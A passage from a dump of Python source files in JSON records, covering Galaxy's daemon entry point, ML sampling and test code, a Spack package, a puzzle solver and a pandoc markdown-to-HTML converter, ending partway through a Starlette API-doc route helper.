f'{self.__class__.__name__}({smiles!r}{fg_repr})'\n\n def __repr__(self) -> str:\n return str(self)\n"} {"ext": "py", "sha": "1a2f44021d4e117d94bf6f0a764f46971f807d64", "content": "#!/usr/bin/env python\n\"\"\" Entry point for starting Galaxy without starting as part of a web server.\n\nExample Usage: Start a job/workflow handler without a web server and with\na given name using.\n\ngalaxy-main --server-name handler0\n\nStart as a daemon with (requires daemonized - install with 'pip install daemonize'):\n\ngalaxy-main -d --daemon-log-file=handler0-daemon.log --pid-file handler0.pid --server-name handler0\n\nIn daemon mode logging of Galaxy (as opposed to this script) is configured via\na loggers section in Galaxy's ini file - this can be overridden with sensible\ndefaults logging to a single file with the following:\n\ngalaxy-main -d --server-name handler0 --daemon-log-file=handler0-daemon.log --pid-file handler0.pid --log-file handler0.log\n\nThis can also be used to start Galaxy as a uWSGI mule, e.g. for job handling:\n\nuwsgi ... --py-call-osafterfork --mule=lib/galaxy/main.py --mule=lib/galaxy/main.py --farm=job-handlers:1,2\n\nThe --py-call-osafterfork allows for proper shutdown on SIGTERM/SIGINT.\n\"\"\"\nimport functools\nimport logging\nimport os\nimport signal\nimport sys\nimport threading\nfrom argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom logging.config import fileConfig\n\ntry:\n from daemonize import Daemonize\nexcept ImportError:\n Daemonize = None\n\ntry:\n import uwsgi\nexcept ImportError:\n uwsgi = None\n\nlog = logging.getLogger(__name__)\n\nreal_file = os.path.realpath(__file__)\nGALAXY_ROOT_DIR_ = os.path.abspath(os.path.join(os.path.dirname(real_file), os.pardir))\nif not os.path.exists(os.path.join(GALAXY_ROOT_DIR_, 'run.sh')):\n # Galaxy is installed\n GALAXY_ROOT_DIR = None\nelse:\n GALAXY_ROOT_DIR = GALAXY_ROOT_DIR_\n GALAXY_LIB_DIR = os.path.join(GALAXY_ROOT_DIR_, \"lib\")\n try:\n sys.path.insert(1, GALAXY_LIB_DIR)\n except Exception:\n log.exception(\"Failed to add Galaxy to sys.path\")\n raise\nfrom galaxy.main_config import (\n absolute_config_path,\n config_is_ini,\n DEFAULT_CONFIG_SECTION,\n DEFAULT_INI_APP,\n find_config,\n)\nfrom galaxy.util import unicodify\nfrom galaxy.web_stack import get_app_kwds\n\nREQUIRES_DAEMONIZE_MESSAGE = \"Attempted to use Galaxy in daemon mode, but daemonize is unavailable.\"\n\nDEFAULT_PID = \"galaxy.pid\"\nDEFAULT_VERBOSE = True\nDESCRIPTION = \"Daemonized entry point for Galaxy.\"\n\nSHUTDOWN_MSG = '__SHUTDOWN__'\nUWSGI_FARMS_VAR = '_GALAXY_UWSGI_FARM_NAMES'\n\n\nexit = threading.Event()\n\n\ndef load_galaxy_app(\n config_builder,\n config_env=False,\n log=None,\n attach_to_pools=None,\n **kwds\n):\n # Allow specification of log so daemon can reuse properly configured one.\n if log is None:\n log = logging.getLogger(__name__)\n\n # If called in daemon mode, set the ROOT directory and ensure Galaxy is on\n # sys.path.\n if config_env:\n try:\n os.chdir(GALAXY_ROOT_DIR)\n except Exception:\n log.exception(\"Failed to chdir\")\n raise\n\n config_builder.setup_logging()\n from galaxy.util.properties import load_app_properties\n kwds = config_builder.app_kwds()\n kwds = load_app_properties(**kwds)\n from galaxy.app import UniverseApplication\n app = UniverseApplication(\n global_conf=config_builder.global_conf(),\n attach_to_pools=attach_to_pools,\n **kwds\n )\n app.database_heartbeat.start()\n app.application_stack.log_startup()\n return app\n\n\ndef handle_signal(signum, frame):\n 
log.info('Received signal %d, exiting', signum)\n if uwsgi and 'mule_id' in dir(uwsgi) and uwsgi.mule_id() > 0:\n farms = os.environ.get(UWSGI_FARMS_VAR, None)\n if farms:\n for farm in farms.split(','):\n uwsgi.farm_msg(farm, SHUTDOWN_MSG)\n else:\n uwsgi.mule_msg(SHUTDOWN_MSG, uwsgi.mule_id())\n exit.set()\n\n\ndef register_signals():\n for name in ('TERM', 'INT', 'HUP'):\n sig = getattr(signal, 'SIG%s' % name)\n signal.signal(sig, handle_signal)\n\n\ndef app_loop(args, log):\n try:\n config_builder = GalaxyConfigBuilder(args)\n config_env = GALAXY_ROOT_DIR is not None\n galaxy_app = load_galaxy_app(\n config_builder,\n config_env=config_env,\n log=log,\n attach_to_pools=args.attach_to_pool,\n )\n except BaseException:\n log.exception(\"Failed to initialize Galaxy application\")\n raise\n try:\n # A timeout is required or the signals won't be handled\n while not exit.wait(20):\n pass\n except (KeyboardInterrupt, SystemExit):\n pass\n try:\n galaxy_app.shutdown()\n except Exception:\n log.exception(\"Failed to shutdown Galaxy application\")\n raise\n\n\nclass GalaxyConfigBuilder:\n \"\"\" Generate paste-like configuration from supplied command-line arguments.\n \"\"\"\n\n def __init__(self, args=None, **kwds):\n self.config_file = None\n self.config_section = None\n self.app_name = kwds.get(\"app\") or (args and args.app) or DEFAULT_CONFIG_SECTION\n config_file = kwds.get(\"config_file\", None) or (args and args.config_file)\n # If given app_conf_path - use that - else we need to ensure we have a\n # config file path.\n if not config_file and 'config_file' in self.app_kwds():\n config_file = self.app_kwds()['config_file']\n if not config_file:\n galaxy_root = kwds.get(\"galaxy_root\", GALAXY_ROOT_DIR)\n config_file = find_config(config_file, galaxy_root)\n config_file = absolute_config_path(config_file, galaxy_root=galaxy_root)\n self.config_file = unicodify(config_file)\n # FIXME: this won't work for non-Paste ini configs\n if self.config_is_ini:\n self.config_section = \"app:%s\" % unicodify(kwds.get(\"app\") or (args and args.app) or DEFAULT_INI_APP)\n else:\n self.config_section = self.app_name\n self.log_file = (args and args.log_file)\n\n @classmethod\n def populate_options(cls, arg_parser):\n arg_parser.add_argument(\"-c\", \"--config-file\", default=None, help=\"Galaxy config file (defaults to config/galaxy.ini)\")\n arg_parser.add_argument(\"--ini-path\", default=None, help=\"DEPRECATED: use -c/--config-file\")\n arg_parser.add_argument(\"--app\", default=None, help=\"app section in config file (defaults to 'galaxy' for YAML/JSON, 'main' (w/ 'app:' prepended) for INI\")\n arg_parser.add_argument(\"-d\", \"--daemonize\", default=False, help=\"Daemonize process\", action=\"store_true\")\n arg_parser.add_argument(\"--daemon-log-file\", default=None, help=\"log file for daemon script \")\n arg_parser.add_argument(\"--log-file\", default=None, help=\"Galaxy log file (overrides log configuration in config_file if set)\")\n arg_parser.add_argument(\"--pid-file\", default=DEFAULT_PID, help=\"pid file (default is %s)\" % DEFAULT_PID)\n arg_parser.add_argument(\"--server-name\", default=None, help=\"set a galaxy server name\")\n arg_parser.add_argument(\"--attach-to-pool\", action=\"append\", default=['job-handlers'], help=\"attach to asynchronous worker pool (specify multiple times for multiple pools)\")\n\n @property\n def config_is_ini(self):\n return config_is_ini(self.config_file)\n\n def app_kwds(self):\n kwds = get_app_kwds(self.app_name, app_name=self.app_name)\n if 'config_file' 
not in kwds:\n kwds['config_file'] = self.config_file\n if 'config_section' not in kwds:\n kwds['config_section'] = self.config_section\n return kwds\n\n def global_conf(self):\n conf = {}\n if self.config_is_ini:\n conf[\"__file__\"] = self.config_file\n return conf\n\n def setup_logging(self):\n # Galaxy will attempt to setup logging if loggers is not present in\n # ini config file - this handles that loggers block however if present\n # (the way paste normally would)\n if not self.config_file:\n return\n if self.config_is_ini:\n raw_config = ConfigParser()\n raw_config.read([self.config_file])\n if raw_config.has_section('loggers'):\n config_file = os.path.abspath(self.config_file)\n fileConfig(\n config_file,\n dict(__file__=config_file, here=os.path.dirname(config_file))\n )\n\n\ndef main(func=app_loop):\n arg_parser = ArgumentParser(description=DESCRIPTION)\n GalaxyConfigBuilder.populate_options(arg_parser)\n args = arg_parser.parse_args()\n if args.ini_path and not args.config_file:\n args.config_file = args.ini_path\n if args.log_file:\n os.environ[\"GALAXY_CONFIG_LOG_DESTINATION\"] = os.path.abspath(args.log_file)\n if args.server_name:\n os.environ[\"GALAXY_CONFIG_SERVER_NAME\"] = args.server_name\n pid_file = args.pid_file\n\n log.setLevel(logging.DEBUG)\n log.propagate = False\n register_signals()\n if args.daemonize:\n if Daemonize is None:\n raise ImportError(REQUIRES_DAEMONIZE_MESSAGE)\n\n keep_fds = []\n if args.daemon_log_file:\n fh = logging.FileHandler(args.daemon_log_file, \"w\")\n fh.setLevel(logging.DEBUG)\n log.addHandler(fh)\n keep_fds.append(fh.stream.fileno())\n else:\n fh = logging.StreamHandler(sys.stderr)\n fh.setLevel(logging.DEBUG)\n log.addHandler(fh)\n\n daemon = Daemonize(\n app=\"galaxy\",\n pid=pid_file,\n action=functools.partial(func, args, log),\n verbose=DEFAULT_VERBOSE,\n logger=log,\n keep_fds=keep_fds,\n )\n daemon.start()\n else:\n func(args, log)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2f4535555f2da39e3616818a12b5a4c107d47b", "content": "# -*- coding: utf-8 -*-\nimport sugartensor as tf\nimport matplotlib.pyplot as plt\n\n# set log level to debug\ntf.sg_verbosity(10)\n\n#\n# hyper parameters\n#\n\nbatch_size = 25\nz_dim = 50\n\n\n#\n# create generator\n#\n\n# random uniform seed\nz = tf.random_uniform((batch_size, z_dim))\n\nwith tf.sg_context(name='generator', size=5, stride=2, act='relu', bn=True):\n # generator network\n gen = (z.sg_dense(dim=1024)\n .sg_dense(dim=7*7*128)\n .sg_reshape(shape=(-1, 7, 7, 128))\n .sg_upconv(dim=64)\n .sg_upconv(dim=1, act='sigmoid', bn=False)\n .sg_squeeze())\n\n\n#\n# draw samples\n#\n\nwith tf.Session() as sess:\n tf.sg_init(sess)\n # restore parameters\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint('asset/train/ckpt'))\n\n # run generator\n imgs = sess.run(gen)\n\n # plot result\n _, ax = plt.subplots(5, 5, sharex=True, sharey=True)\n for i in range(5):\n for j in range(5):\n ax[i][j].imshow(imgs[i * 5 + j], 'gray')\n ax[i][j].set_axis_off()\n plt.savefig('asset/train/sample.png', dpi=600)\n tf.sg_info('Sample image saved to \"asset/train/sample.png\"')\n plt.close()\n"} {"ext": "py", "sha": "1a2f46441e61603778a4538a28f056da2e0c9228", "content": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy import Item, Field\n\n\n# core thinker object\n\"\"\"thinker item; represents one Wikipedia page, unless no page\"\"\"\nclass 
Thinker(Item):\n name = Field()\n link = Field()\n\n # lists of names\n influences = Field()\n influenced = Field()\n"} {"ext": "py", "sha": "1a2f46b3cae6de88140e6ec40ea6d4d8cd467da9", "content": "from arm.logicnode.arm_nodes import *\n\n\nclass RandomBooleanNode(ArmLogicTreeNode):\n \"\"\"Generates a random boolean.\"\"\"\n bl_idname = 'LNRandomBooleanNode'\n bl_label = 'Random Boolean'\n arm_version = 1\n\n def arm_init(self, context):\n self.add_output('ArmBoolSocket', 'Bool')\n"} {"ext": "py", "sha": "1a2f4a9003f7056f98e14377d576f3c434efd272", "content": "# Copyright 2019 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for tfx.components.example_gen.utils.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Standard Imports\n\nimport tensorflow as tf\nfrom tfx.components.example_gen import utils\n\n\nclass UtilsTest(tf.test.TestCase):\n\n def test_get_default_output_config(self):\n output_config = utils.get_default_output_config()\n self.assertEqual(2, len(output_config.split_config.splits))\n\n\nif __name__ == '__main__':\n tf.test.main()\n"} {"ext": "py", "sha": "1a2f4ba51b1638be24e791d8458fa4801710132b", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os\nfrom shutil import rmtree\nfrom tempfile import mkdtemp\n\nfrom pelican.generators import ArticlesGenerator\nfrom pelican.tests.support import unittest, get_settings\nimport sub_parts\n\nCUR_DIR = os.path.dirname(__file__)\n\n\nclass TestSubParts(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.temp_path = mkdtemp(prefix='pelicantests.')\n settings = get_settings(filenames={})\n settings['PATH'] = os.path.join(CUR_DIR, 'test_data')\n settings['AUTHOR'] = 'Me'\n settings['DEFAULT_DATE'] = (1970, 1, 1)\n settings['DEFAULT_CATEGORY'] = 'Default'\n settings['FILENAME_METADATA'] = '(?P[^.]+)'\n settings['PLUGINS'] = [sub_parts]\n settings['CACHE_CONTENT'] = False\n context = settings.copy()\n context['generated_content'] = dict()\n context['static_links'] = set()\n cls.generator = ArticlesGenerator(\n context=context, settings=settings,\n path=settings['PATH'], theme=settings['THEME'], output_path=cls.temp_path)\n cls.generator.generate_context()\n cls.all_articles = list(cls.generator.articles)\n sub_parts.patch_subparts(cls.generator)\n\n @classmethod\n def tearDownClass(cls):\n rmtree(cls.temp_path)\n\n def test_all_articles(self):\n self.assertEqual(\n sorted(['noparent', 'parent',\n 'parent--explicit', 'parent--implicit']),\n sorted([a.slug for a in self.all_articles]))\n\n def test_articles(self):\n self.assertEqual(\n sorted(['noparent', 'parent']),\n sorted([a.slug for a in self.generator.articles]))\n\n def test_dates(self):\n self.assertEqual(\n sorted(['noparent', 'parent']),\n sorted([a.slug for a in self.generator.dates]))\n\n def test_categories(self):\n self.assertEqual(\n sorted(['noparent', 'parent']),\n sorted([a.slug for a in 
self.generator.categories[0][1]]))\n\n def test_tags(self):\n self.assertEqual(\n sorted([a.slug for a in self.all_articles]),\n sorted([a.slug for a in self.generator.tags['atag']]))\n\n def test_authors(self):\n self.assertEqual(\n sorted([a.slug for a in self.all_articles]),\n sorted([a.slug for a in self.generator.authors[0][1]]))\n\n def test_subparts(self):\n for a in self.all_articles:\n if a.slug == 'parent':\n self.assertTrue(hasattr(a, 'subparts'))\n self.assertEqual(\n sorted(['parent--explicit', 'parent--implicit']),\n sorted([a.slug for a in a.subparts]))\n else:\n self.assertFalse(hasattr(a, 'subparts'))\n\n def test_subpart_of(self):\n for a in self.all_articles:\n if '--' in a.slug:\n self.assertTrue(hasattr(a, 'subpart_of'))\n self.assertEqual('parent', a.subpart_of.slug)\n else:\n self.assertFalse(hasattr(a, 'subpart_of'))\n\n def test_subtitle(self):\n for a in self.all_articles:\n if '--' in a.slug:\n self.assertTrue(hasattr(a, 'subtitle'))\n self.assertEqual(a.title,\n a.subtitle + ', ' + a.subpart_of.title)\n\n\nclass TestSubPartsPhotos(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.temp_path = mkdtemp(prefix='pelicantests.')\n settings = get_settings(filenames={})\n settings['PATH'] = os.path.join(CUR_DIR, 'test_data')\n settings['AUTHOR'] = 'Me'\n settings['DEFAULT_DATE'] = (1970, 1, 1)\n settings['DEFAULT_CATEGORY'] = 'Default'\n settings['FILENAME_METADATA'] = '(?P[^.]+)'\n settings['PLUGINS'] = [sub_parts]\n settings['CACHE_CONTENT'] = False\n context = settings.copy()\n context['generated_content'] = dict()\n context['static_links'] = set()\n cls.generator = ArticlesGenerator(\n context=context, settings=settings,\n path=settings['PATH'], theme=settings['THEME'], output_path=cls.temp_path)\n cls.generator.generate_context()\n cls.all_articles = list(cls.generator.articles)\n for a in cls.all_articles:\n a.photo_gallery = [('i.jpg', 'i.jpg', 'it.jpg', '', '')]\n sub_parts.patch_subparts(cls.generator)\n\n @classmethod\n def tearDownClass(cls):\n rmtree(cls.temp_path)\n\n def test_subphotos(self):\n for a in self.all_articles:\n if a.slug == 'parent':\n self.assertTrue(hasattr(a, 'subphotos'))\n self.assertEqual(3, a.subphotos)\n else:\n self.assertFalse(hasattr(a, 'subphotos'))\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f4bf38709bca0c900194842760c3304bedeff", "content": "import turtle\nimport os\n\nt = turtle.Pen()\n#t.speed(0)\nt.shape(\"turtle\")\nt.left(90)\nfor i in range(6):\n t.forward(100)\n t.right(60)\n for j in range(3):\n t.forward(20)\n t.backward(20)\n t.left(60)\n t.right(120)\n t.backward(100)\n t.left(60)\n\nos.system(\"Pause\")"} {"ext": "py", "sha": "1a2f4c2681d3490af76ce5c1f381f74258cb1d49", "content": "##############################################################################\n# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n#\n# This file is part of Spack.\n# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.\n# LLNL-CODE-647188\n#\n# For details, see https://github.com/spack/spack\n# Please also see the NOTICE and LICENSE files for our notice and the LGPL.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License (as\n# published by the Free Software Foundation) version 2.1, February 1999.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the IMPLIED 
WARRANTY OF\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and\n# conditions of the GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n##############################################################################\nfrom spack import *\n\n\nclass Xbacklight(AutotoolsPackage):\n \"\"\"Xbacklight is used to adjust the backlight brightness where supported.\n It uses the RandR extension to find all outputs on the X server\n supporting backlight brightness control and changes them all in the\n same way.\"\"\"\n\n homepage = \"http://cgit.freedesktop.org/xorg/app/xbacklight\"\n url = \"https://www.x.org/archive/individual/app/xbacklight-1.2.1.tar.gz\"\n\n version('1.2.1', 'e8e4c86b0f867e23aa3532618a697609')\n\n depends_on('libxcb')\n depends_on('xcb-util')\n\n depends_on('pkgconfig', type='build')\n depends_on('util-macros', type='build')\n"} {"ext": "py", "sha": "1a2f4c653b260f819dd0c1ba1773663bf9adac68", "content": "import os\n\n\ndef align(step):\n path = os.getcwd()\n file_path = os.path.join(path, 'whales.txt')\n file1 = open(file_path, 'r')\n Lines = file1.readlines()\n initial_pos = [0] * 2000\n final = 0\n for line in Lines:\n input = line.strip()\n poss = input.split(\",\")\n prev_fuel = -1\n for median in range(0, int(poss[len(poss)-1])+1):\n fuel = 0\n for pos in poss:\n n = abs(int(pos) - int(median))\n fuel += n * (n+1)/2 if step else n\n if fuel < prev_fuel or prev_fuel == -1:\n prev_fuel = fuel\n\n print(int(prev_fuel))\n\n\nif __name__ == \"__main__\":\n align(False)\n align(True)\n"} {"ext": "py", "sha": "1a2f4e17d97df7bbbfca1934c1f3300bf31c9b4a", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the Zeitgeist event formatter.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport unittest\n\nfrom plaso.formatters import zeitgeist\n\nfrom tests.formatters import test_lib\n\n\nclass ZeitgeistFormatterTest(test_lib.EventFormatterTestCase):\n \"\"\"Tests for the Zeitgeist activity database event formatter.\"\"\"\n\n def testInitialization(self):\n \"\"\"Tests the initialization.\"\"\"\n event_formatter = zeitgeist.ZeitgeistFormatter()\n self.assertIsNotNone(event_formatter)\n\n def testGetFormatStringAttributeNames(self):\n \"\"\"Tests the GetFormatStringAttributeNames function.\"\"\"\n event_formatter = zeitgeist.ZeitgeistFormatter()\n\n expected_attribute_names = ['subject_uri']\n\n self._TestGetFormatStringAttributeNames(\n event_formatter, expected_attribute_names)\n\n # TODO: add test for GetMessages.\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f4e17e44131e61bca54ff4dcb336000f8d1c2", "content": "#!/usr/bin/env python3\n\"\"\"\nConvert $1 -- a markdown file to an HTML file in `/tmp/vim//.html`.\n\"\"\"\n\n# Standard Library\nfrom os.path import realpath, basename, isfile, isdir, dirname, abspath\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport re\nimport logging\nfrom logging import Logger\nfrom typing import Dict, Iterable, Optional, Set, Text, List\nfrom subprocess import DEVNULL, PIPE, run\n\nfrom meta import MATHJAX_CONFS, LongOpt, CodeStyle, FromFmt, Ext, ToFmt\nfrom utils import validate_executables, require_exists, vimdir_path, ensure_exists\n\n# initalise logging with sane configuration\nlogging.basicConfig(level=logging.WARN,\n 
format=\"%(levelname)s:%(asctime)s %(message)s\")\n\nlog: Logger = logging.getLogger()\n\nvalidate_executables([\"pandoc\"])\n\n\n# NOTE this will try to include a lua filter from `./task-list.lua`.\nclass PandocCmd:\n def __init__(\n self,\n input_file: Text,\n stylesheet: Text = vimdir_path(\"css\", \"styles.css\"),\n javascript: Text = vimdir_path(\"js\", \"script.js\"),\n from_fmt: FromFmt = FromFmt.MARKDOWN,\n to_fmt: ToFmt = ToFmt.HTML5,\n exts: List[Ext] = [\n Ext.ASCII_IDENTIFIERS,\n Ext.AUTOLINK_BARE_URIS,\n Ext.COMPACT_DEFINITION_LISTS,\n Ext.FENCED_DIVS,\n Ext.GFM_AUTO_IDENTIFIERS,\n Ext.INTRAWORD_UNDERSCORES,\n Ext.MARKDOWN_ATTRIBUTE,\n Ext.MMD_HEADER_IDENTIFIERS,\n Ext.MMD_LINK_ATTRIBUTES,\n Ext.SMART,\n Ext.TEX_MATH_DOLLARS,\n Ext.TEX_MATH_DOUBLE_BACKSLASH,\n Ext.TEX_MATH_SINGLE_BACKSLASH,\n ],\n no_exts: List[Ext] = [Ext.ALL_SYMBOLS_ESCAPABLE, Ext.ESCAPED_LINE_BREAKS],\n long_opts: Dict[LongOpt, Optional[Text]] = {\n LongOpt.ATX_HEADERS: None,\n LongOpt.REFERENCE_LOCATION: \"document\",\n LongOpt.SECTION_DIVS: None,\n LongOpt.EMAIL_OBFUSCATION: \"javascript\",\n },\n code_style: CodeStyle = CodeStyle.TANGO,\n mathjax_version: Text = \"2.7.5\",\n mathjax_conf: Text = \"TeX-AMS_HTML\",\n width: int = 80,\n toc_depth: int = 3,\n ) -> None:\n\n log.debug(\"initalising a PandocCmd object\")\n\n self.exts: List[Ext] = []\n self.no_exts: List[Ext] = []\n self.long_opts: Dict[LongOpt, Optional[Text]] = dict()\n\n self.set_opts(long_opts).set_exts(exts).set_no_exts(no_exts).set_input_file(\n input_file\n ).set_opt(LongOpt.STANDALONE).set_to_fmt(to_fmt).set_from_fmt(\n from_fmt\n ).set_mathjax(\n mathjax_version, mathjax_conf\n ).set_width(\n width\n ).set_stylesheet(\n stylesheet\n ).set_code_style(\n code_style\n ).set_javascript(\n javascript\n )\n\n if toc_depth:\n self.set_toc_depth(toc_depth).set_opt(LongOpt.TOC)\n\n lua_filter: str = os.path.join(os.path.dirname(\n os.path.abspath(__file__)), 'task-list.lua')\n\n if isfile(lua_filter):\n self.set_opt(LongOpt.LUA_FILTER, lua_filter)\n else:\n log.error(f'failed to find lua filter ./{lua_filter}')\n\n def set_from_fmt(self, fmt: FromFmt) -> object:\n assert fmt in FromFmt, f\"from format '{fmt}' invalid\"\n self.from_fmt: FromFmt = fmt\n return self\n\n def set_opt(self, key: LongOpt, val: Optional[Text] = None) -> object:\n self.long_opts[key] = val\n return self\n\n def set_opts(self, pairs: Dict[LongOpt, Optional[Text]]) -> object:\n for (k, v) in pairs.items():\n self.set_opt(k, v)\n return self\n\n def set_to_fmt(self, fmt: ToFmt) -> object:\n self.to_fmt = fmt\n return self\n\n def set_input_file(self, file_path: Text) -> object:\n require_exists(file_path)\n self.input_file = file_path\n return self\n\n def set_width(self, n: int) -> object:\n assert n and n >= 0, f\"invalid value {str(n)}\"\n return self.set_opt(LongOpt.COLUMNS, str(n))\n\n def set_stylesheet(self, css_path: Text) -> object:\n require_exists(css_path)\n return self.set_opt(LongOpt.CSS, css_path)\n\n def set_javascript(self, js_path: Text) -> object:\n require_exists(js_path)\n self.javascript = js_path\n return self\n\n def set_toc_depth(self, n: int) -> object:\n assert n and n >= 0, f\"invalid value {n}\"\n return self.set_opt(LongOpt.TOC_DEPTH, str(n))\n\n def set_code_style(self, style: CodeStyle) -> object:\n return self.set_opt(LongOpt.HIGHLIGHT_STYLE, style._name_.lower())\n\n def set_mathjax(self, version: Text, cfg: Text) -> object:\n assert cfg and cfg in MATHJAX_CONFS, f\"unreconginsed MathJax config {cfg}\"\n assert (\n version\n and 
len(version) >= 3\n and version[0] == \"2\"\n and version[1] == \".\"\n and str.isdigit(version[2])\n ), f\"unrecognised MathJax version {version}\"\n return self.set_opt(\n LongOpt.MATHJAX,\n f\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/{version}/MathJax.js?config={cfg}\",\n )\n\n def set_exts(self, exts: Iterable[Ext]) -> object:\n for ext in exts:\n self.set_ext(ext)\n return self\n\n def set_ext(self, ext: Ext) -> object:\n self.exts.append(ext)\n return self\n\n def set_no_ext(self, ext: Ext) -> object:\n self.no_exts.append(ext)\n return self\n\n def set_no_exts(self, exts: Iterable[Ext]) -> object:\n for ext in exts:\n self.set_no_ext(ext)\n return self\n\n @property\n def args(self) -> List[Text]:\n\n arguments = [\"pandoc\", \"--from\"]\n\n from_fmt = self.from_fmt._name_.lower()\n if len(self.exts) > 0:\n for ext in self.exts:\n from_fmt += f\"+{ext._name_.lower()}\"\n if len(self.no_exts) > 0:\n for ext in self.no_exts:\n from_fmt += f\"-{ext._name_.lower()}\"\n\n arguments.append(from_fmt)\n\n arguments.extend([\"--to\", self.to_fmt._name_.lower()])\n\n for opt in self.long_opts.keys():\n maybe_val: Optional[Text] = self.long_opts[opt]\n opt_name: Text = opt._name_.lower().replace(\"_\", \"-\")\n if maybe_val:\n arguments.append(f\"--{opt_name}={maybe_val}\")\n else:\n arguments.append(f\"--{opt_name}\")\n log.debug(f\"args: {arguments}\")\n return arguments\n\n def before(self, text: Text) -> Text:\n \"\"\"Fix badly formatted markdown where heading marker `#` is not\n followed by space.\n\n NOTE: This method is pure.\n\n :param text: input text before transformations\n :return: output text after transformations\n \"\"\"\n log.debug(\"preprocessing [before hook]\")\n return re.sub(r\"(#+)([A-Z])\", \"\\1 \\2\", text, re.MULTILINE)\n\n def after(self, text: Text) -> Text:\n \"\"\"Transform relative links and references, Inject JavaScript.\n\n NOTE: This method is pure.\n\n Match on either src or href e.g.:\n\n `src=\"./script.js\"` and `href=\"styles.css\"`\n\n skip over whitespace e.g.:\n\n `src=\" address/file.png\"`\n\n match if relative e.g.:\n\n `./`\n or match if not an external link with a protocol e.g.:\n\n `https://stackoverflow.com`\n\n or match if not a valid directory reference e.g.:\n\n `/srv/log/log.txt` and `~/file.txt`\n\n :param text: input text\n :return: output after transformations\n \"\"\"\n pat = re.compile(r'(href|src)=\"\\s*(\\./|(?![a-z]{2,10}://|~|\\#|/))')\n d: Text = dirname(self.input_file)\n with open(self.javascript) as f:\n log.debug(\"postprocessing [after hook]\")\n return re.sub(pat, f'\\\\1=\"{d}/', text).replace(\n \"\", f\"\"\n )\n\n def execute(self) -> Text:\n log.debug(\"executing\")\n with open(self.input_file, encoding=\"utf-8\") as input:\n return self.after(\n run(\n self.args,\n encoding=\"utf-8\",\n input=self.before(input.read()),\n stderr=DEVNULL,\n stdout=PIPE,\n ).stdout\n )\n\n\nif __name__ == \"__main__\":\n\n INPUT_FILE = sys.argv[1]\n\n log.debug(f\"input file: {INPUT_FILE}\")\n\n OUTPUT_FILE: Text = os.path.join(\n \"/tmp/vim\",\n basename(dirname(INPUT_FILE)),\n re.sub(\n r\"^(.*)\\.(?:r?md|m(?:ark)?down)$\",\n r\"\\1.html\",\n basename(INPUT_FILE),\n re.IGNORECASE | re.MULTILINE,\n ),\n )\n\n log.debug(f\"output file: {OUTPUT_FILE}\")\n\n ensure_exists(OUTPUT_FILE)\n\n with open(OUTPUT_FILE, \"w\", encoding=\"utf-8\") as output:\n cmd = PandocCmd(INPUT_FILE)\n output.write(cmd.execute())\n print(f\"Cmd: {' '.join(cmd.args)}\")\n print(f'Output: {output.name}')\n\n# vim:foldmethod=manual:\n"} {"ext": "py", "sha": 
"1a2f4e20d52fd7abc28470acbfa72929fc69b781", "content": "import logging\nfrom typing import Any, Dict, List, Optional\n\nfrom starlette.applications import Starlette\nfrom starlette.exceptions import HTTPException\nfrom starlette.requests import Request\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.routing import Mount, Route\n\nfrom pait.api_doc.html import get_redoc_html as _get_redoc_html\nfrom pait.api_doc.html import get_swagger_ui_html as _get_swagger_ui_html\nfrom pait.api_doc.open_api import PaitOpenApi\nfrom pait.field import Depends, Query\nfrom pait.g import config\nfrom pait.model.core import PaitCoreModel\nfrom pait.model.status import PaitStatus\n\nfrom ._load_app import load_app\nfrom ._pait import Pait\n\n\ndef add_doc_route(\n app: Starlette,\n scheme: Optional[str] = None,\n prefix: str = \"/\",\n pin_code: str = \"\",\n title: str = \"Pait Doc\",\n open_api_tag_list: Optional[List[Dict[str, Any]]] = None,\n) -> None:\n if pin_code:\n logging.info(f\"doc route start pin code:{pin_code}\")\n\n doc_pait: Pait = Pait(\n author=config.author or (\"so1n\",),\n status=config.status or PaitStatus.release,\n tag=(\"pait_doc\",),\n group=\"pait_doc\",\n )\n\n def _get_request_pin_code(r_pin_code: str = Query.i(\"\", alias=\"pin_code\")) -> Optional[str]:\n if pin_code:\n if r_pin_code != pin_code:\n raise HTTPException(\n status_code=404,\n detail=(\n \"The requested URL was not found on the server. If you entered\"\n \" the URL manually please check your spelling and try again.\"\n ),\n )\n return r_pin_code\n\n def _get_open_json_url(request: Request, r_pin_code: str) -> str:\n openapi_json_url: str = f\"{'/'.join(request.url.path.split('/')[:-1])}/openapi.json\"\n if r_pin_code:\n openapi_json_url += 